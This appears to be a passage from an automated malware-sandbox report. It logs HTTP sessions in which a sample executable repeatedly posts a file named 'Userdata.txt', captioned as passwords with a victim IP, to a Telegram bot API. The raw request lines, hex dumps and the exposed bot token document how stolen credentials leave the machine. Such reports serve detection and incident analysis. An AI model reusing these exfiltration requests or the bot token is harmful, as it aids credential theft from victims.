                                                                                                            2025-01-10 21:32:13 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43592,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544733,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.350020149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:14 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33123f8d9267
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:14 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 31 32 33 66 38 64 39 32 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33123f8d9267Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:14 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:14 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:14 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43593,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544734,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.350022149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:16 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3324bc118176
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:16 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 32 34 62 63 31 31 38 31 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3324bc118176Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:16 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:16 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:16 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43594,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544736,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.350024149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:17 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33387c549528
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 33 38 37 63 35 34 39 35 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33387c549528Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:18 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:18 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:18 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43595,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544738,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.350026149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:19 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd334ade3c8869
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:19 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 34 61 64 65 33 63 38 38 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd334ade3c8869Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:20 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:20 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:20 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43596,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544740,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            26192.168.2.350028149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:21 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3367a8105a58
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:21 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 36 37 61 38 31 30 35 61 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3367a8105a58Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:21 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:21 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:21 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43597,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544741,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            27192.168.2.350030149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:23 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd337dd438127d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:23 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 37 64 64 34 33 38 31 32 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd337dd438127dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:23 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:23 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:23 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43598,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544743,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            28192.168.2.350032149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:24 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd339688ded35d
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:24 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 39 36 38 38 64 65 64 33 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd339688ded35dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:25 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:25 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
